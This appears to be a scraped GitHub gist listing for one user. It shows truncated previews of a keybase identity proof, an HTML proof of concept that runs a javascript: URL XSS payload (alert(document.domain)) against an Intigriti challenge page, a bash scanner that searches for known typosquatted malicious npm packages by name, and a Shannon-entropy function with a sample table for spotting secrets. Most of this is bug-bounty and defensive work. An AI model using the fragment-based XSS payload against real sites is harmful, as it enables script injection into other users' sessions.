I hereby claim:
- I am radekk on github.
- I am radekk (https://keybase.io/radekk) on keybase.
- I have a public key ASDTZzfkj8mjeJ6ZLTm-fWU9dLhJY2EpTMjShIcw9Cjz-go
To claim this, I am signing this object:
<html> | |
<body> | |
<iframe id="ifr"></iframe> | |
<script> | |
var ifr = document.getElementById('ifr'); | |
ifr.src = 'https://challenge.intigriti.io/#https://intigriti.io'; | |
ifr.onload = () => { | |
setTimeout(() => { | |
ifr.src = 'https://challenge.intigriti.io/#javascript:alert(document.domain)'; |
#!/bin/bash | |
# Author: @radekk | |
# List of vulnerable packages is from https://twitter.com/iamakulov/status/892485192883073024 | |
# ---------------------- | |
_IFS=$IFS | |
_COUNTER=0 | |
_COUNTER_ALL=0 | |
_SCAN_PATH=${1:-~/} | |
_VULN_PACKAGES="babelcli crossenv cross-env.js d3.js fabric-js ffmepg gruntcli http-proxy.js jquery.js mariadb mongose mssql.js mssql-node mysqljs nodecaffe nodefabric node-fabric nodeffmpeg nodemailer-js nodemailer.js nodemssql node-opencv node-opensl node-openssl noderequest nodesass nodesqlite node-sqlite node-tkinter opencv.js openssl.js proxy.js shadowsock smb sqlite.js sqliter sqlserver tkinter" | |
_REGEXP="(babelcli|crossenv|cross-env\.js|d3\.js|fabric-js|ffmepg|gruntcli|http-proxy\.js|jquery\.js|mariadb|mongose|mssql\.js|nodecaffe|nodefabric|node-fabric|nodeffmpeg|nodemailer-js|nodemailer\.js|nodemssql|node-opencv|node-opensl|node-openssl|noderequest|nodesass|nodesqlite|node-sqlite|node-tkinter|opencv\.js|openssl\.js|proxy\.js|shadowsock|smb|sqlite\.js|sqliter|sqlserver|tkinter)" |
/** | |
* Calculate Shannon's entropy for a string | |
*/ | |
module.exports = (str) => { | |
const set = {}; | |
str.split('').forEach( | |
c => (set[c] ? set[c]++ : (set[c] = 1)) | |
); |
╔════════════════════════════════════════════╦═════════╗ | |
║ String ║ Entropy ║ | |
╠════════════════════════════════════════════╬═════════╣ | |
║ john.doe+test@example.com ║ 3.8937 ║ | |
║ https://auth0.com/this-is-test-url-4575812 ║ 4.2728 ║ | |
║ THIS_IS_NOT_A_SECRET_ONLY_A_PROPERTY_KEY ║ 3.6464 ║ | |
║ /etc/init.d/rc4/script.sh ║ 3.5133 ║ | |
║ button[value="test1337"] ║ 3.9183 ║ | |
╚════════════════════════════════════════════╩═════════╝ |
I hereby claim:
To claim this, I am signing this object: